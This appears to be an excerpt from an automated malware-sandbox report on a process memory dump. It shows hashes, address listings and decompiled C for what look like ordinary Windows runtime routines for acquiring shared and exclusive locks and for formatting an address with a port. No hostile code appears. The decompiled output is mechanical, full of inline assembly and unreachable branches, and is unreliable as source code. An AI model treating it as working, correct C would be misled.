                                          0x0238eacf
                                          0x00000000
                                          0x0238eade
                                          0x0238eade
                                          0x0238eae3
                                          0x00000000
                                          0x00000000
                                          0x0238eaf3
                                          0x0238eaf6
                                          0x0238eaf7
                                          0x0238eafe
                                          0x0238eb01
                                          0x00000000
                                          0x0238eb01
                                          0x0238eacf
                                          0x02360ad0
                                          0x02360ad4
                                          0x00000000
                                          0x00000000
                                          0x02360ada
                                          0x02360ae6
                                          0x02360c34
                                          0x00000000
                                          0x02360c47
                                          0x02360c49
                                          0x02360c4a
                                          0x02360c4e
                                          0x02360c51
                                          0x02360c54
                                          0x02360c57
                                          0x02360c5a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x02360c60
                                          0x02360afb
                                          0x02360afe
                                          0x02360b02
                                          0x02360b05
                                          0x02360b08
                                          0x00000000
                                          0x02360b08
                                          0x02360ae6
                                          0x02360b44
                                          0x023609f8
                                          0x023609f8
                                          0x023609f9
                                          0x00000000
                                          0x00000000
                                          0x0238eaa0
                                          0x00000000

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, Offset: 02300000, based on PE: true
                                          • Associated: 00000007.00000002.663440597.0000000002300000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663536466.00000000023F0000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663545005.0000000002400000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663553811.0000000002404000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663561380.0000000002407000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663567943.0000000002410000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663609294.0000000002470000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: __fassign
                                          • String ID: .$:$:
                                          • API String ID: 3965848254-2308638275
                                          • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                          • Instruction ID: ea3950c6513d2e1a8d61c26bc86e50159c82a53911e1305b494c694a851064f3
                                          • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                          • Instruction Fuzzy Hash: 46A1A071D0420ADECF28DF54C84A7BEB7BEBF05308F24C46AD452AB24AD7319659CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02360554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 49%
                                          			E02360554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x024001c0;
									_push(_t144);
									_push(0);
									_t51 = E0231F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E02364FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E02373F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E02373F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E023A217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02373F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E02363915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x024001c0;
												_push(_t138);
												_push(0);
												_t58 = E0231F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E02364FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E02373F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E02373F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E023A217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E02373F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E02363915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E02345384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E0231F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E02363915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E0231F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E02363915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E0231F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E02363915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L58;
																}
																E02345329(_t110, _t138);
																return E023453A5(_t138, 1);
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L58;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L58;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L58;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L58:
			}



































                                          0x0236055a
                                          0x0236055d
                                          0x02360563
                                          0x02360566
                                          0x023605d8
                                          0x023605e2
                                          0x023605e5
                                          0x00000000
                                          0x023605e7
                                          0x023605e7
                                          0x023605ea
                                          0x023605f3
                                          0x023605f3
                                          0x02360568
                                          0x02360568
                                          0x02360568
                                          0x02360569
                                          0x02360569
                                          0x02360569
                                          0x0236056b
                                          0x00000000
                                          0x00000000
                                          0x0238217f
                                          0x02382183
                                          0x0238225b
                                          0x0238225f
                                          0x02382189
                                          0x0238218c
                                          0x0238218f
                                          0x02382194
                                          0x02382199
                                          0x0238219d
                                          0x023821a0
                                          0x023821a2
                                          0x023821ce
                                          0x023821ce
                                          0x023821ce
                                          0x023821d0
                                          0x023821d6
                                          0x023821de
                                          0x023821e2
                                          0x023821e8
                                          0x023821e9
                                          0x023821ec
                                          0x023821f1
                                          0x023821f6
                                          0x00000000
                                          0x00000000
                                          0x023821f8
                                          0x023821fb
                                          0x02382206
                                          0x0238220b
                                          0x0238220c
                                          0x02382217
                                          0x02382226
                                          0x0238222b
                                          0x0238222c
                                          0x0238222f
                                          0x02382232
                                          0x02382235
                                          0x02382235
                                          0x0238223a
                                          0x0238223f
                                          0x02382241
                                          0x02382243
                                          0x02382248
                                          0x02382248
                                          0x0238224d
                                          0x0238224f
                                          0x02382262
                                          0x02382263
                                          0x02382268
                                          0x02382269
                                          0x02382269
                                          0x02382269
                                          0x0238226d
                                          0x00000000
                                          0x00000000
                                          0x02382276
                                          0x02382279
                                          0x0238227e
                                          0x02382283
                                          0x02382287
                                          0x0238228a
                                          0x0238228d
                                          0x0238228f
                                          0x023822bc
                                          0x023822bc
                                          0x023822bc
                                          0x023822be
                                          0x023822c4
                                          0x023822cc
                                          0x023822d0
                                          0x023822d6
                                          0x023822d7
                                          0x023822da
                                          0x023822df
                                          0x023822e4
                                          0x00000000
                                          0x00000000
                                          0x023822e6
                                          0x023822e9
                                          0x023822f4
                                          0x023822f9
                                          0x023822fa
                                          0x02382305
                                          0x02382314
                                          0x02382319
                                          0x0238231a
                                          0x0238231d
                                          0x02382320
                                          0x02382323
                                          0x02382323
                                          0x02382328
                                          0x0238232d
                                          0x0238232f
                                          0x02382331
                                          0x02382336
                                          0x02382336
                                          0x0238233b
                                          0x0238233d
                                          0x02382350
                                          0x02382351
                                          0x02382356
                                          0x02382359
                                          0x02382359
                                          0x0238235b
                                          0x0238235d
                                          0x02345367
                                          0x0234536b
                                          0x02345372
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x02382363
                                          0x02382363
                                          0x02382369
                                          0x0238236a
                                          0x0238236c
                                          0x02382371
                                          0x02382373
                                          0x00000000
                                          0x02382379
                                          0x02382379
                                          0x0238237a
                                          0x0238237f
                                          0x0238237f
                                          0x02382385
                                          0x02382386
                                          0x02382389
                                          0x0238238e
                                          0x02382390
                                          0x02345378
                                          0x0234537c
                                          0x02382396
                                          0x02382396
                                          0x02382397
                                          0x0238239c
                                          0x023823a2
                                          0x023823a3
                                          0x023823a6
                                          0x023823ab
                                          0x023823ad
                                          0x00000000
                                          0x023823b3
                                          0x023823b3
                                          0x023823b4
                                          0x023823b9
                                          0x023823ba
                                          0x023823ba
                                          0x023823bc
                                          0x023823bf
                                          0x00000000
                                          0x00000000
                                          0x02379153
                                          0x02379158
                                          0x0237915a
                                          0x0237915e
                                          0x02379160
                                          0x00000000
                                          0x02379166
                                          0x02379166
                                          0x02379171
                                          0x02379176
                                          0x02379176
                                          0x00000000
                                          0x02379160
                                          0x023823c6
                                          0x023823d7
                                          0x023823d7
                                          0x023823ad
                                          0x02382390
                                          0x02382373
                                          0x0238233f
                                          0x0238233f
                                          0x00000000
                                          0x0238233f
                                          0x02382291
                                          0x02382291
                                          0x02382293
                                          0x02382295
                                          0x0238229a
                                          0x023822a1
                                          0x023822a3
                                          0x023822a7
                                          0x023822a9
                                          0x00000000
                                          0x00000000
                                          0x023822ab
                                          0x023822ad
                                          0x023822af
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x023822af
                                          0x023822b1
                                          0x023822b4
                                          0x023822b4
                                          0x023822b6
                                          0x023453be
                                          0x023453be
                                          0x023453be
                                          0x023453c0
                                          0x00000000
                                          0x00000000
                                          0x023453cb
                                          0x023453ce
                                          0x023453d0
                                          0x023453d4
                                          0x023453d6
                                          0x00000000
                                          0x023453d8
                                          0x023453e3
                                          0x023453ea
                                          0x023453ea
                                          0x00000000
                                          0x023453d6
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x023822b6
                                          0x00000000
                                          0x0238228f
                                          0x02382349
                                          0x0238234d
                                          0x02382251
                                          0x02382251
                                          0x00000000
                                          0x02382251
                                          0x023821a4
                                          0x023821a4
                                          0x023821a6
                                          0x023821a8
                                          0x023821ac
                                          0x023821b6
                                          0x023821b8
                                          0x023821bc
                                          0x023821be
                                          0x00000000
                                          0x00000000
                                          0x023821c0
                                          0x023821c2
                                          0x023821c4
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x023821c4
                                          0x023821c6
                                          0x023821c6
                                          0x023821c8
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x023821c8
                                          0x023821a2
                                          0x00000000
                                          0x02382183
                                          0x0236057b
                                          0x0236057d
                                          0x02360581
                                          0x02360583
                                          0x02382178
                                          0x00000000
                                          0x02360589
                                          0x0236058f
                                          0x0236058f
                                          0x02360583
                                          0x00000000

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02382206
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, Offset: 02300000, based on PE: true
                                          • Associated: 00000007.00000002.663440597.0000000002300000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663536466.00000000023F0000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663545005.0000000002400000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663553811.0000000002404000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663561380.0000000002407000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663567943.0000000002410000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663609294.0000000002470000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 885266447-4236105082
                                          • Opcode ID: 9137f8bf9f33e897ed80c0bdd59991b54fc5c195d303e4f75df23ee6edc921df
                                          • Instruction ID: f7f6936a1c12b2a5257e859e700f88051765e725b677b843b860b6e8c45a64dd
                                          • Opcode Fuzzy Hash: 9137f8bf9f33e897ed80c0bdd59991b54fc5c195d303e4f75df23ee6edc921df
                                          • Instruction Fuzzy Hash: BB5138717003516FEB25DE18CC81FA733AAAF88720F218269FD55DF285DA71EC428B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 023614C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 64%
                                          			E023614C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x2402088; // 0x76a365d9
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E02357707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E023613CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E02357707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E02357707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E02322340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E0232E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                          0x023614c0
                                          0x023614cb
                                          0x023614d2
                                          0x023614d6
                                          0x023614da
                                          0x023614de
                                          0x023614e3
                                          0x0236157a
                                          0x0236157a
                                          0x023614f1
                                          0x023614f3
                                          0x0238ea0f
                                          0x00000000
                                          0x0238ea15
                                          0x00000000
                                          0x0238ea15
                                          0x023614f9
                                          0x023614f9
                                          0x023614fe
                                          0x02361504
                                          0x0238ea1a
                                          0x0238ea1f
                                          0x0238ea21
                                          0x0238ea22
                                          0x0238ea27
                                          0x0238ea2a
                                          0x0238ea2a
                                          0x02361515
                                          0x02361517
                                          0x0236156d
                                          0x02361572
                                          0x02361575
                                          0x02361575
                                          0x0236151e
                                          0x0238ea50
                                          0x0238ea55
                                          0x0238ea58
                                          0x0238ea58
                                          0x0236152e
                                          0x02361531
                                          0x02361533
                                          0x00000000
                                          0x02361535
                                          0x02361541
                                          0x02361549
                                          0x02361549
                                          0x02361533
                                          0x023614f3
                                          0x02361559

                                          APIs
                                          • ___swprintf_l.LIBCMT ref: 0238EA22
                                            • Part of subcall function 023613CB: ___swprintf_l.LIBCMT ref: 0236146B
                                            • Part of subcall function 023613CB: ___swprintf_l.LIBCMT ref: 02361490
                                          • ___swprintf_l.LIBCMT ref: 0236156D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, Offset: 02300000, based on PE: true
                                          • Associated: 00000007.00000002.663440597.0000000002300000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663536466.00000000023F0000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663545005.0000000002400000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663553811.0000000002404000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663561380.0000000002407000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663567943.0000000002410000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663609294.0000000002470000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: %%%u$]:%u
                                          • API String ID: 48624451-3050659472
                                          • Opcode ID: ad30bda190c673fbd081c5a760953fa86d5686675c3a7ef29c00445c94af9eda
                                          • Instruction ID: 5e7f915459e9b8b2e78ec4566a3e576cc4af557ccb4ffefcd3842349fec8c44c
                                          • Opcode Fuzzy Hash: ad30bda190c673fbd081c5a760953fa86d5686675c3a7ef29c00445c94af9eda
                                          • Instruction Fuzzy Hash: 5E21C3729002299BDB20EE54DC49AFEB3ACEB50704F448056ED8AD3244DB70EA588FE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 023453A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 44%
                                          			E023453A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x024001c0;
									_push(_t92);
									_push(0);
									_t37 = E0231F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E02364FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E02373F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E02373F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E023A217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02373F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E02363915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E02345384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E0231F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E02363915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E0231F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E02363915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E0231F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E02363915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L37;
													}
													E02345329(_t74, _t92);
													_push(1);
													return E023453A5(_t92);
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L37;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L37:
			}

























                                          0x023453ab
                                          0x023453ae
                                          0x023453b1
                                          0x023453b4
                                          0x023453b7
                                          0x023605b6
                                          0x023605c0
                                          0x023605c3
                                          0x00000000
                                          0x023605c9
                                          0x023605c9
                                          0x023605cc
                                          0x023605d5
                                          0x023605d5
                                          0x023453bd
                                          0x023453bd
                                          0x023453bd
                                          0x023453be
                                          0x023453be
                                          0x023453be
                                          0x023453c0
                                          0x00000000
                                          0x00000000
                                          0x02382269
                                          0x0238226d
                                          0x02382349
                                          0x0238234d
                                          0x02382273
                                          0x02382276
                                          0x02382279
                                          0x0238227e
                                          0x02382283
                                          0x02382287
                                          0x0238228a
                                          0x0238228d
                                          0x0238228f
                                          0x023822bc
                                          0x023822bc
                                          0x023822bc
                                          0x023822be
                                          0x023822c4
                                          0x023822cc
                                          0x023822d0
                                          0x023822d6
                                          0x023822d7
                                          0x023822da
                                          0x023822df
                                          0x023822e4
                                          0x00000000
                                          0x00000000
                                          0x023822e6
                                          0x023822e9
                                          0x023822f4
                                          0x023822f9
                                          0x023822fa
                                          0x02382305
                                          0x02382314
                                          0x02382319
                                          0x0238231a
                                          0x0238231d
                                          0x02382320
                                          0x02382323
                                          0x02382323
                                          0x02382328
                                          0x0238232d
                                          0x0238232f
                                          0x02382331
                                          0x02382336
                                          0x02382336
                                          0x0238233b
                                          0x0238233d
                                          0x02382350
                                          0x02382351
                                          0x02382356
                                          0x02382359
                                          0x02382359
                                          0x0238235b
                                          0x0238235d
                                          0x02345367
                                          0x0234536b
                                          0x02345372
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x02382363
                                          0x02382363
                                          0x02382369
                                          0x0238236a
                                          0x0238236c
                                          0x02382371
                                          0x02382373
                                          0x00000000
                                          0x02382379
                                          0x02382379
                                          0x0238237a
                                          0x0238237f
                                          0x0238237f
                                          0x02382385
